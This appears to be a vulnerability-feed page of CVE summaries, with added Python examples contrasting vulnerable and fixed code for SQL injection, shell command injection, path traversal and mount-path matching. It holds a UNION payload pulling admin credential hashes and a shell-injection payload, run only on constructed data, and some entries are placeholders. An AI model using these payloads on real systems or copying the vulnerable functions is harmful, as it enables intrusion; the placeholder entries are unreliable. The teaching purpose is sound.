SQL injection in itsourcecode Online Frozen Foods Ordering System 1.0 allows remote attackers with high privileges to manipulate the product_name parameter in /admin/admin_edit_menu.php, enabling unauthorized data access and modification. Public exploit code exists for this vulnerability, increasing the risk of active exploitation. The affected PHP application currently lacks an available patch.
PHP
SQLi
-
CVE-2026-4469
MEDIUM
CVSS 4.7
SQL injection in itsourcecode Online Frozen Foods Ordering System 1.0 allows remote attackers with high-level privileges to manipulate the product_name parameter in /admin/admin_edit_menu_action.php, potentially exposing or modifying sensitive database information. Public exploit code for this vulnerability exists, though no patch is currently available.
PHP
SQLi
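Added example serving CVE-2026-4485 and the itsourcecode findings CVE-2026-4473 through CVE-2026-4469; it is not the applications' code. It shows the string-spliced query these findings share, a UNION payload that pulls rows from another table through it, and the bound-parameter form that makes the same input inert. The schema, rows and payload are constructed and run against in-memory SQLite.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE menu(id INTEGER PRIMARY KEY, product_name TEXT, price REAL);
        INSERT INTO menu(product_name, price) VALUES ('Frozen Peas', 2.5), ('Ice Cream', 4.0);
        CREATE TABLE admin_users(username TEXT, password_hash TEXT);
        INSERT INTO admin_users VALUES ('admin', '$2y$10$constructed.hash.value');
        """
    )
    return conn


def find_menu_vuln(conn: sqlite3.Connection, product_name: str) -> list:
    """The pattern behind this class of finding: the request parameter is
    spliced straight into the SQL text, so quotes in it become syntax."""
    sql = f"SELECT id, product_name, price FROM menu WHERE product_name = '{product_name}'"
    return conn.execute(sql).fetchall()


def find_menu_safe(conn: sqlite3.Connection, product_name: str) -> list:
    """Parameter binding: the value is sent separately from the query text and
    can never change the query's structure."""
    return conn.execute(
        "SELECT id, product_name, price FROM menu WHERE product_name = ?",
        (product_name,),
    ).fetchall()


# Constructed UNION payload: three columns to match the original SELECT, and a
# trailing comment to swallow the closing quote the application appends.
PAYLOAD = "x' UNION SELECT rowid, username, password_hash FROM admin_users -- "
```

The vulnerable query returns the admin credential row for PAYLOAD; the bound version returns nothing, because the whole string is compared against product_name as data. In PHP the equivalent is a prepared statement with bound parameters instead of interpolating $_POST values into the query string.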
-
CVE-2026-4468
MEDIUM
CVSS 4.7
Command injection in Comfast CF-AC100 2.6.0.8 allows remote attackers with administrative privileges to execute arbitrary commands through the /cgi-bin/mbox-config endpoint. The attack requires administrative credentials but has low complexity; public exploit code exists and no vendor patch is available. Affected devices can be compromised remotely, with the CVSS 4.7 score reflecting the limited scope.
Command Injection
-
CVE-2026-4467
MEDIUM
CVSS 4.7
Command injection in the Comfast CF-AC100 2.6.0.8 wireless configuration endpoint allows remote attackers to execute arbitrary commands with elevated privileges through the /cgi-bin/mbox-config interface. The entry describes the attacker as unauthenticated, but the CVSS 4.7 score, identical to the sibling CF-AC100 issues that require administrative credentials, indicates high privileges are required, so treat the authentication claim with caution. Public exploit code exists, and the vendor has not released a patch despite early notification. The attack needs network access but no user interaction, so exposed management interfaces are readily exploitable.
Command Injection
-
CVE-2026-4466
MEDIUM
CVSS 4.7
Command injection in Comfast CF-AC100 2.6.0.8 allows authenticated remote attackers to execute arbitrary commands via the /cgi-bin/mbox-config endpoint's ntp_timezone parameter. Public exploit code exists for this vulnerability, and the vendor has not provided a patch or response to disclosure notifications. An attacker with high-level privileges can leverage this to compromise device integrity and confidentiality.
Command Injection
-
CVE-2026-4465
MEDIUM
CVSS 5.3
OS command injection in D-Link DIR-513 1.10 via the /goform/formSysCmd endpoint allows authenticated remote attackers to execute arbitrary commands with network access. The vulnerability stems from insufficient input validation of the sysCmd parameter and has public exploit code available. No patch is available, and affected devices are no longer supported by D-Link.
D-Link
Command Injection
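Added example covering the Comfast CF-AC100, D-Link DIR-513 and Git-MCP-Server entries; it is not any vendor's code. It shows a handler that splices a request value into a shell command line, the same handler without a shell (the equivalent of child_process.execFile in Node, or subprocess with an argument list), and an allowlist check in front of it. The timezone parameter, the allowlist pattern and the payload are constructed; echo stands in for whatever the firmware actually runs.

```python
import re
import subprocess

# Constructed allowlist for the one value this handler legitimately accepts:
# tz database names look like "Europe/Berlin" or "Etc/GMT+2".
TZ_NAME = re.compile(r"[A-Za-z0-9_+\-]+(/[A-Za-z0-9_+\-]+)*")


def set_timezone_vuln(tz: str) -> str:
    """The vulnerable shape: request data concatenated into a shell command line."""
    result = subprocess.run(
        f"echo setting timezone to {tz}", shell=True, capture_output=True, text=True
    )
    return result.stdout


def set_timezone_no_shell(tz: str) -> str:
    """No shell at all: the value travels as a single argv entry and is never
    parsed for metacharacters."""
    result = subprocess.run(
        ["echo", "setting", "timezone", "to", tz], capture_output=True, text=True
    )
    return result.stdout


def set_timezone_hardened(tz: str) -> str:
    """Allowlist validation first, then the argv form. Validation alone is not
    enough (the next shell feature you forgot about will bite), and argv alone
    still passes junk to the program; do both."""
    if not TZ_NAME.fullmatch(tz):
        raise ValueError(f"rejected timezone value: {tz!r}")
    return set_timezone_no_shell(tz)


# Constructed payload in the style of the router findings.
PAYLOAD = "UTC; echo INJECTED"
```

Run the three functions with PAYLOAD: the shell version executes the second command and prints INJECTED on its own line, the argv version prints the whole string as one literal argument, and the hardened version refuses the value before anything runs.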
-
CVE-2026-4453
MEDIUM
CVSS 4.3
Cross-origin data leakage in Google Chrome's Dawn component on macOS, in versions prior to 146.0.7680.153, results from an integer overflow that a malicious HTML page can trigger. An attacker can use it to read information belonging to other origins; the only user interaction needed is viewing the crafted page. Patches are available for Chrome, Ubuntu, and Debian.
Google
Information Disclosure
Ubuntu
Debian
Chrome
-
CVE-2026-4438
MEDIUM
CVSS 5.4
The GNU C Library (glibc) versions 2.34 through 2.43 contain a vulnerability in gethostbyaddr and gethostbyaddr_r: when nsswitch.conf selects the DNS backend, the functions can return hostnames that violate DNS specification requirements. Any application or system service that performs reverse DNS lookups through glibc and trusts the returned name to be well formed (for logging, access decisions, or building further requests) is affected, which makes this a data integrity issue in a foundational library present on most Linux systems. The entry carries a CVSS score of 5.4; no EPSS probability or active exploitation has been reported.
Information Disclosure
-
CVE-2026-4136
MEDIUM
CVSS 4.3
The Membership Plugin - Restrict Content for WordPress contains an unvalidated redirect vulnerability in the 'rcp_redirect' parameter that allows unauthenticated attackers to redirect users to arbitrary external sites via password reset emails. Affected versions include all releases up to and including 3.2.24. This vulnerability has a CVSS score of 4.3 (low-to-moderate severity) and requires user interaction, limiting its immediate exploitation impact but creating a viable phishing vector for credential harvesting or malware distribution.
WordPress
Information Disclosure
-
CVE-2026-4083
MEDIUM
CVSS 6.4
This is a Stored Cross-Site Scripting (XSS) vulnerability in the Scoreboard for HTML5 Games Lite WordPress plugin affecting all versions up to and including 1.2. The vulnerability exists in the sfhg_shortcode() function, which insufficiently validates HTML attributes added to iframe elements, allowing authenticated attackers with Contributor-level access or above to inject arbitrary JavaScript that executes when users view affected pages. The vulnerability has a CVSS score of 6.4 with medium real-world risk, as it requires authenticated access but affects stored content with site-wide impact.
WordPress
XSS
-
CVE-2026-3864
MEDIUM
CVSS 6.5
The Kubernetes NFS CSI Driver fails to properly validate the subDir parameter in volume identifiers, allowing privileged users to inject path traversal sequences that bypass intended directory restrictions. Attackers with PersistentVolume creation privileges can craft malicious volume identifiers to access and modify arbitrary directories on the NFS server during cleanup operations. No patch is currently available for this medium-severity vulnerability affecting Kubernetes environments.
Kubernetes
Path Traversal
-
CVE-2026-3577
MEDIUM
CVSS 4.4
The Keep Backup Daily WordPress plugin versions up to 2.1.2 contain a Stored Cross-Site Scripting (XSS) vulnerability in the backup title alias functionality due to insufficient input sanitization and output escaping. Authenticated administrators can inject arbitrary JavaScript via the `val` parameter in the `update_kbd_bkup_alias` AJAX action, which executes when other administrators view the backup list page. With a CVSS score of 4.4 and moderate real-world risk due to high privilege requirements, this vulnerability requires administrator-level access to exploit but can compromise other administrator sessions.
WordPress
XSS
-
CVE-2026-3572
MEDIUM
CVSS 6.1
The iTracker360 WordPress plugin (versions up to 2.2.0) contains a combined Cross-Site Request Forgery (CSRF) and Stored Cross-Site Scripting (XSS) vulnerability in its settings form submission handler. An unauthenticated attacker can craft a malicious link or webpage that, when clicked by an administrator, injects arbitrary JavaScript code into the plugin's stored settings due to missing nonce verification and insufficient input sanitization/output escaping. This vulnerability is classified as medium severity (CVSS 6.1) and poses a real risk to WordPress sites using this plugin, as exploitation requires only user interaction and network access with no special privileges.
WordPress
XSS
CSRF
-
CVE-2026-3567
MEDIUM
CVSS 5.3
A WordPress plugin [plugin name not captured in this entry] is vulnerable to unauthorized access in all versions [range not captured] (CVSS 5.3) that any authenticated user can exploit. Remediation should follow standard vulnerability management procedures.
WordPress
Authentication Bypass
-
CVE-2026-3550
MEDIUM
CVSS 5.3
The RockPress WordPress plugin (versions up to 1.0.17) contains a Missing Authorization vulnerability in five AJAX actions that allows authenticated users with Subscriber-level privileges to trigger privileged operations intended for administrators. The vulnerability stems from a combination of missing capability checks (current_user_can() calls) in AJAX handlers and exposure of an admin nonce to all authenticated users via an unconditionally enqueued script. Attackers can extract the nonce from the HTML source and use it to trigger resource-intensive imports, reset import data, check service connectivity, and read import status information without administrative privileges.
WordPress
PHP
Authentication Bypass
-
CVE-2026-3516
MEDIUM
CVSS 6.4
A Stored Cross-Site Scripting (XSS) vulnerability exists in the Contact List plugin for WordPress (versions up to 3.0.18) where the '_cl_map_iframe' parameter fails to properly sanitize and escape Google Maps iframe custom fields, allowing authenticated attackers with Contributor-level access or higher to inject arbitrary JavaScript that executes in the browsers of users viewing affected pages. The vulnerability stems from insufficient input validation in the saveCustomFields() function and missing output escaping in the front-end rendering, creating a persistent XSS condition with a CVSS score of 6.4 and low-to-moderate exploitation probability given the authentication requirement.
WordPress
PHP
XSS
Google
-
CVE-2026-3474
MEDIUM
CVSS 4.9
The EmailKit - Email Customizer for WooCommerce & WP WordPress plugin contains a path traversal vulnerability in the TemplateData class that allows authenticated administrators to read arbitrary files from the server via the 'emailkit-editor-template' REST API parameter. An attacker with Administrator privileges can supply directory traversal sequences to read sensitive files such as wp-config.php or /etc/passwd; the retrieved contents are stored as post metadata and can be fetched back through the fetch-data REST API endpoint. The vulnerability affects all versions up to and including 1.6.3. It requires administrative access and carries a moderate CVSS score of 4.9, but it is a serious information disclosure risk in multi-user WordPress environments.
WordPress
PHP
Path Traversal
-
CVE-2026-3350
MEDIUM
CVSS 6.4
A Stored Cross-Site Scripting (XSS) vulnerability exists in the Image Alt Text Manager plugin for WordPress (all versions up to 1.8.2) due to insufficient input sanitization and output escaping when dynamically generating image alt and title attributes via DOM parser. Authenticated attackers with Author-level access or higher can inject arbitrary JavaScript through post titles, which executes when other users visit affected pages. With a CVSS score of 6.4 and confirmed reporting by Wordfence, this vulnerability affects SEO-focused WordPress installations relying on this plugin for bulk alt text management.
WordPress
XSS
-
CVE-2026-2432
MEDIUM
CVSS 4.4
CM Custom Reports - Flexible reporting to track what matters most plugin for WordPress contains a Stored Cross-Site Scripting (XSS) vulnerability in admin settings that allows authenticated administrators to inject arbitrary web scripts. The vulnerability affects all versions up to and including 1.2.7 and is caused by insufficient input sanitization and output escaping in the GraphModule.php file. While the CVSS score of 4.4 is moderate, exploitation is restricted to high-privilege authenticated attackers on multi-site WordPress installations or where unfiltered_html has been disabled, making real-world exploitability dependent on specific WordPress configurations.
WordPress
XSS
-
CVE-2026-2430
MEDIUM
CVSS 6.4
The Autoptimize WordPress plugin contains a Stored Cross-Site Scripting (XSS) vulnerability in the lazy-loading image processing function that allows authenticated attackers with Contributor-level access to inject arbitrary web scripts into pages. The flaw exists in all versions up to and including 3.1.14 and stems from an overly permissive regular expression that fails to properly validate image tag attributes, enabling attackers to craft malicious image tags that break HTML structure and promote attribute values into executable code. This vulnerability carries a moderate CVSS score of 6.4 and requires user interaction for stored XSS payloads to execute when pages are accessed.
WordPress
XSS
-
CVE-2026-2421
MEDIUM
CVSS 6.5
A Path Traversal vulnerability exists in the ilGhera Carta Docente for WooCommerce plugin for WordPress (versions up to and including 1.5.0) that allows authenticated administrators to delete arbitrary files on the server through insufficient validation of the 'cert' parameter in the 'wccd-delete-certificate' AJAX action. An attacker with administrator privileges can exploit this to delete critical files such as wp-config.php, leading to site takeover and potential remote code execution. The vulnerability has been documented by Wordfence security researchers and affects all versions from release through 1.5.0, with a patch available in version 1.5.1 and later.
WordPress
PHP
Path Traversal
RCE
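Added example covering the path-traversal entries on this page (File Thingie CVE-2026-30580, Kubernetes NFS CSI CVE-2026-3864, EmailKit CVE-2026-3474, Carta Docente CVE-2026-2421); it is not any of those projects' code. It resolves a caller-supplied relative path under a base directory and refuses anything that ends up outside, including a symlink inside the tree that points out of it. The directory layout in demo() is constructed in a temporary directory.

```python
import os
import tempfile
from pathlib import Path, PurePosixPath


class UnsafePath(ValueError):
    """Raised when a caller-supplied path would leave the permitted directory."""


def safe_join(base: str, relative: str) -> Path:
    """Resolve `relative` under `base` and prove the result still lives there.

    Three checks, because each catches something the others miss:
      1. absolute paths, '..' segments and NUL bytes are rejected before touching the filesystem;
      2. resolve() follows symlinks, so a link inside base pointing outside is caught;
      3. relative_to() does the final containment test on the resolved real path.
    """
    rel = PurePosixPath(relative)
    if rel.is_absolute() or ".." in rel.parts or "\x00" in relative:
        raise UnsafePath(relative)
    base_real = Path(base).resolve()
    candidate = (base_real / rel).resolve()
    try:
        candidate.relative_to(base_real)
    except ValueError:
        raise UnsafePath(relative) from None
    return candidate


def delete_under(base: str, relative: str) -> None:
    """The shape of a safe 'delete this certificate / share / volume sub-dir' handler."""
    target = safe_join(base, relative)
    if target.is_file():
        target.unlink()


def demo() -> dict:
    """Constructed layout: base/inside.txt, a sibling outside.txt, and a symlink
    base/link that points outside. Returns which inputs were accepted."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp, "base")
        base.mkdir()
        (base / "inside.txt").write_text("ok")
        Path(tmp, "outside.txt").write_text("secret")
        os.symlink(Path(tmp, "outside.txt"), base / "link")
        inputs = ["inside.txt", "../outside.txt", "link", "/etc/passwd",
                  "sub/../inside.txt", "sub/new.txt"]
        results = {}
        for item in inputs:
            try:
                safe_join(str(base), item)
                results[item] = "accepted"
            except UnsafePath:
                results[item] = "rejected"
        return results
```

The strict rejection of '..' anywhere is deliberate: 'sub/../inside.txt' would resolve inside the base, but no legitimate client of a delete-certificate or volume-cleanup handler needs to write paths that way, and refusing them removes a whole class of normalisation bugs. On Windows the same idea applies but drive letters, backslashes and UNC prefixes need their own rejection rules.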
-
CVE-2026-2352
MEDIUM
CVSS 6.4
A Stored Cross-Site Scripting (XSS) vulnerability exists in the Autoptimize WordPress plugin through version 3.1.14, caused by insufficient input sanitization in the ao_metabox_save() function and missing output escaping when rendering the 'ao_post_preload' meta value into HTML link tags. Authenticated attackers with Contributor-level access or higher can inject arbitrary JavaScript that executes whenever users access pages with the Image optimization or Lazy-load images settings enabled, potentially affecting all users of compromised sites. The vulnerability has been patched and proof-of-concept code is available in the referenced GitHub commit.
WordPress
PHP
XSS
-
CVE-2025-63260
MEDIUM
CVSS 5.4
SyncFusion versions up to 30.1.37 contain stored Cross-Site Scripting (XSS) vulnerabilities in two distinct UI components: the Document-Editor reply-to-comment field and the Chat-UI chat message field. An attacker can inject JavaScript through these fields; the payload is stored and executes in the browsers of other users who view the affected content, potentially enabling session hijacking, credential theft, or malware distribution. No EPSS data or KEV status is currently available, but proof-of-concept details are documented in the pentest-tools reference (PTT-2025-023-Multiple-Stored-XSS.pdf).
XSS
-
CVE-2025-62845
MEDIUM
CVSS 5.6
An improper neutralization of escape, meta, or control sequences vulnerability (CWE-150) affects QNAP QHora/QuRouter devices, allowing local attackers with administrator privileges to cause unexpected behaviour by injecting unfiltered control sequences. The vulnerability has been patched in QuRouter version 2.6.3.009 and later. No EPSS probability, KEV listing or public proof of concept is currently published, and the requirement for local administrator access significantly limits the exploitation scope in typical deployments.
Privilege Escalation
Qurouter
-
CVE-2025-62844
MEDIUM
CVSS 4.0
A weak authentication vulnerability exists in QNAP QHora/QuRouter devices that allows attackers with local network access to bypass authentication mechanisms and disclose sensitive information. The vulnerability affects QuRouter versions prior to 2.6.2.007, and exploitation requires network-level access but no special privileges. No EPSS data is publicly available, but the classification as CWE-1390 (Weak Authentication) and the emphasis on local network access mark this as a network-adjacent threat with moderate real-world risk, particularly where untrusted devices can join the local network.
Information Disclosure
Qurouter
-
CVE-2025-46598
MEDIUM
CVSS 5.3
Bitcoin Core versions through 29.0 contain a denial of service vulnerability that can be triggered by a specially crafted transaction. An attacker with network access can send such a transaction to make the affected node unresponsive or crash it, disrupting its normal operation. No EPSS data or active exploitation in the wild has been disclosed, but the vulnerability has been formally disclosed by the Bitcoin Core project.
Denial Of Service
-
CVE-2024-31119
MEDIUM
CVSS 5.9
Improper neutralization of input during web page generation ('cross-site scripting') in Vasilis Triantafyllou's Special Box for Content allows DOM-based XSS. Rated medium severity (CVSS 5.9), the vulnerability is remotely exploitable with low attack complexity. No vendor patch is available.
XSS
-
CVE-2026-33490
LOW
CVSS 3.7
The h3 web framework contains a path-matching vulnerability in its mount() method that fails to enforce path segment boundaries when checking if requests fall under a mounted sub-application's prefix. This allows attackers to trigger middleware intended for a path like /admin on unrelated routes such as /admin-public or /administrator, potentially polluting request context with unintended privilege flags and leading to authorization bypass. A proof-of-concept is available demonstrating context pollution across mount boundaries, and the vulnerability affects all h3 v2 applications using mount() with prefix-vulnerable path configurations.
Information Disclosure
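Added example, not h3's code: the bare prefix test beside a segment-aware one, the sub-path the mounted application should receive, and a minimal dispatcher showing how a loose matcher sets a privilege flag on unrelated routes. Paths are assumed to be the decoded, dot-segment-normalised path component with no query string, which is the router's job before any matching happens.

```python
def under_mount_naive(path: str, prefix: str) -> bool:
    """The flawed check: a bare prefix test, so '/admin' also claims '/admin-public'."""
    return path.startswith(prefix)


def under_mount(path: str, prefix: str) -> bool:
    """True only when `path` is the mount point itself or a descendant of it.
    A trailing slash on the prefix is ignored; the root mount '/' matches everything."""
    prefix = prefix.rstrip("/") or "/"
    if prefix == "/":
        return path.startswith("/")
    if not path.startswith(prefix):
        return False
    rest = path[len(prefix):]
    return rest == "" or rest.startswith("/")   # the next character must close the segment


def sub_path(path: str, prefix: str) -> str:
    """Path as the mounted sub-application should see it (call only after under_mount)."""
    prefix = prefix.rstrip("/") or "/"
    if prefix == "/":
        return path
    return path[len(prefix):] or "/"


def dispatch(path: str, matcher) -> dict:
    """Minimal router: middleware mounted at /admin marks the request context as
    privileged; the matcher decides which requests get that mark."""
    ctx = {"path": path, "admin_area": False}
    if matcher(path, "/admin"):
        ctx["admin_area"] = True   # with a loose matcher this is the context pollution
    return ctx
```

The naive matcher flags /admin-public and /administrator as admin traffic, which is the context pollution the advisory describes; the segment-aware one accepts /admin, /admin/ and /admin/users only, and still lets a root mount of '/' see everything.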
-
CVE-2026-33426
LOW
CVSS 3.5
Discourse versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2 contain an authorization bypass vulnerability where users with tag-editing permissions can edit and create tag synonyms for tags within restricted tag groups, even when those users lack visibility into the restricted tags themselves. This represents a broken access control issue (CWE-862) with low CVSS score (3.5) due to high privilege requirement and limited impact scope, though it enables unauthorized information disclosure and tag manipulation within the platform. No public exploit code or active exploitation in the wild has been reported at this time.
Authentication Bypass
-
CVE-2026-33423
LOW
CVSS 1.3
A privilege escalation vulnerability in Discourse allows staff members to modify group notification levels for any user without proper authorization checks. This affects Discourse versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2, enabling authenticated staff users to alter notification settings for other users in ways they should not be permitted to. No EPSS data or public exploit has been reported; the vulnerability is classified under CWE-862 (Missing Authorization) and has been assigned a GitHub Security Advisory (GHSA-qggq-wr6h-vhrg), with patches available.
Authentication Bypass
-
CVE-2026-33422
LOW
CVSS 3.5
Discourse versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2 contain an information disclosure vulnerability where IP addresses of flagged users are exposed to any user with access to the review queue, including those without proper authorization. This allows unauthorized access to sensitive network information that should be restricted to administrators. The vulnerability has a CVSS score of 3.5 (low severity) with no known public exploits or KEV designation, but represents a clear privacy and data protection issue in moderation workflows.
Information Disclosure
-
CVE-2026-33070
LOW
CVSS 3.7
FileRise, a self-hosted web file manager and WebDAV server, contains a missing-authentication vulnerability in the deleteShareLink endpoint that allows unauthenticated attackers to delete arbitrary file share links by providing only the share token, resulting in denial of service to legitimate users accessing shared files. All versions prior to 3.8.0 are affected. While the CVSS score is moderate at 3.7 due to high attack complexity, the vulnerability has a published proof-of-concept via the GitHub security advisory and represents a trivial attack surface requiring only knowledge of a share token.
PHP
Denial Of Service
CSRF
Authentication Bypass
-
CVE-2026-32828
LOW
CVSS 2.0
Kargo versions 1.4.0-1.6.3, 1.7.0-1.7.8, 1.8.0-1.8.11, and 1.9.0-1.9.4 contain a Server-Side Request Forgery vulnerability in http and http-download promotion steps that allows authenticated attackers to access cloud instance metadata endpoints and exfiltrate sensitive credentials like IAM keys. An attacker with permissions to create or modify Stages or Promotion resources can exploit this by crafting malicious manifests with full control over request headers and methods, bypassing cloud provider SSRF protections. Currently, no patch is available for this vulnerability.
SSRF
Information Disclosure
-
CVE-2026-32765
None
Rejected reason: This repository is no longer public.
Information Disclosure
-
CVE-2026-32764
None
Rejected reason: This repository is no longer public.
Information Disclosure
-
CVE-2026-32595
LOW
CVSS 3.7
Traefik's BasicAuth middleware contains a timing attack vulnerability that enables username enumeration through observable response time differences between valid and invalid usernames. An unauthenticated network attacker can distinguish existing usernames from non-existent ones by measuring response latency: valid usernames trigger ~166ms bcrypt operations while invalid usernames return in ~0.6ms, creating a ~298x timing differential. Affected versions include Traefik 2.11.40 and below, 3.0.0-beta1 through 3.6.11, and 3.7.0-ea.1; patches are available in versions 2.11.41, 3.6.11, and 3.7.0-ea.2.
Information Disclosure
-
CVE-2026-30888
LOW
CVSS 2.2
A privilege escalation vulnerability in Discourse allows moderators to edit site policy documents (Terms of Service, guidelines, privacy policy) despite explicit access restrictions, enabling unauthorized modification of critical site governance documents. This affects Discourse versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2. The vulnerability has a low CVSS score of 2.2 due to high attack complexity and privileged access requirement, but represents a clear integrity violation of role-based access controls.
Privilege Escalation
-
CVE-2026-23277
None
A NULL pointer dereference vulnerability exists in the Linux kernel's TEQL (Trivial Ethernet Queue Limiting) network scheduler when transmitting through tunnel slave devices, particularly gretap tunnels. The vulnerability occurs because teql_master_xmit() fails to update skb->dev to the slave device before transmission, causing tunnel xmit functions to reference unallocated per-CPU statistics on the TEQL master device. This allows a local or networked attacker to trigger a kernel page fault and crash the system, resulting in a denial of service. No CVSS score, EPSS risk score, or KEV active exploitation status is currently published, but patch commits are available in Linux kernel stable branches (6.18.19, 6.19.9, and 7.0-rc4).
Linux
Denial Of Service
Null Pointer Dereference
Debian
Ubuntu
-
CVE-2026-23276
None
A stack overflow vulnerability exists in the Linux kernel's tunnel transmission functions (iptunnel_xmit and ip6tunnel_xmit) due to missing recursion limits when GRE tap interfaces operate as slaves in bonded devices with broadcast mode enabled. This allows local attackers or legitimate multicast/broadcast traffic to trigger infinite recursion between bond_xmit_broadcast() and tunnel transmission functions, causing kernel stack exhaustion and denial of service. The vulnerability affects multiple Linux kernel versions and has been resolved with the addition of IP_TUNNEL_RECURSION_LIMIT (4) to prevent excessive stack consumption during nested tunnel packet encapsulation.
Linux
Denial Of Service
Stack Overflow
Debian
Ubuntu
-
CVE-2026-22895
LOW
CVSS 2.2
A cross-site scripting (XSS) vulnerability exists in QuFTP Service that allows authenticated remote attackers with administrator credentials to bypass security mechanisms and read application data. The vulnerability affects multiple versions of QuFTP Service across different release branches (1.4.x, 1.5.x, and 1.6.x prior to specified patch versions). While no CVSS score, EPSS probability, or KEV status is currently available, the requirement for administrator-level access significantly constrains real-world exploitation risk.
XSS
-
CVE-2026-22735
LOW
CVSS 2.6
CVE-2026-22735 is a security vulnerability (CVSS 2.6). Remediation should follow standard vulnerability management procedures.
Java
Information Disclosure
-
CVE-2026-4495
LOW
CVSS 3.5
A Stored Cross-Site Scripting (XSS) vulnerability exists in atjiu pybbs 6.0.0 within the CommentApiController.java file's create function, allowing authenticated attackers to inject malicious scripts that execute in the browsers of other users viewing comments. The vulnerability requires user interaction (UI:R per CVSS vector) but carries a low CVSS score of 3.5 due to low impact scope; however, a public proof-of-concept exploit is available and the vulnerability has been disclosed, increasing real-world exploitation risk despite the low severity rating.
Java
XSS
-
CVE-2026-4494
LOW
CVSS 3.5
A stored cross-site scripting (XSS) vulnerability exists in atjiu pybbs 6.0.0 within the TopicApiController.java create function that allows authenticated attackers to inject malicious scripts into topic creation requests. The vulnerability affects all versions of the pybbs application matching the CPE cpe:2.3:a:atjiu:pybbs:*:*:*:*:*:*:*:*, and while the CVSS score of 3.5 is low, a publicly available proof-of-concept exploit has been disclosed, indicating active research and potential real-world exploitation risk.
XSS
Java
-
CVE-2026-4477
LOW
CVSS 3.1
Yi Technology YI Home Camera 2 (version 2.1.1_20171024151200) contains a hard-coded cryptographic key vulnerability in its WPA/WPS component that allows attackers to disclose sensitive information through local network access. While the exploit has been publicly disclosed and proof-of-concept code is available, the attack is of high complexity and difficult to exploit, limiting real-world risk to local network environments only. The vendor was notified early but provided no response, leaving users without an official patch.
Information Disclosure
-
CVE-2026-4474
LOW
CVSS 2.4
A stored cross-site scripting (XSS) vulnerability exists in itsourcecode University Management System version 1.0 within the /admin_single_student_update.php file, where the st_name parameter fails to properly sanitize user input. An authenticated administrator with high privileges can inject malicious scripts that execute in the context of other users' browsers, potentially leading to session hijacking, credential theft, or unauthorized administrative actions. A proof-of-concept exploit has been publicly disclosed on GitHub, increasing real-world exploitation risk despite the low CVSS score of 2.4.
PHP
XSS
-
CVE-2026-3339
LOW
CVSS 2.7
The Keep Backup Daily WordPress plugin versions up to 2.1.1 contain a limited path traversal vulnerability in the `kbd_open_upload_dir` AJAX action that allows authenticated administrators to enumerate arbitrary directories on the server. An attacker with Administrator-level access can exploit insufficient sanitization of the `kbd_path` parameter (using only `sanitize_text_field()` which does not prevent path traversal sequences) to list directory contents outside the intended uploads directory. While the CVSS score of 2.7 is low and exploitation requires high-privilege Administrator access, the vulnerability represents a real information disclosure risk in multi-user WordPress environments or where administrator accounts are compromised.
WordPress
Path Traversal
-
CVE-2025-62843
LOW
CVSS 0.9
An improper restriction of communication channel to intended endpoints vulnerability (CWE-923) has been identified in QNAP QHora devices, allowing attackers with physical access to exploit insufficient endpoint validation and gain privileges intended for legitimate endpoints. The vulnerability affects QHora/QuRouter products prior to version 2.6.3.009. While no CVSS score or EPSS data is currently available and the vulnerability does not appear in active exploitation databases (KEV), the physical access requirement significantly constrains real-world exploitability, though the privilege escalation impact remains concerning for organizations with physical security controls.
Privilege Escalation
Authentication Bypass
Qurouter
-
CVE-2025-59383
LOW
CVSS 2.7
A stack-based buffer overflow vulnerability exists in QNAP Media Streaming Add-On that allows remote attackers to corrupt memory or crash the affected process. All versions prior to 500.1.1 are vulnerable, and the attack requires no authentication or user interaction. While no CVSS score or EPSS data is currently available, the presence of a confirmed patch and the critical nature of buffer overflow vulnerabilities in media processing software suggests this warrants immediate patching.
Buffer Overflow
Denial Of Service
Media Streaming Add On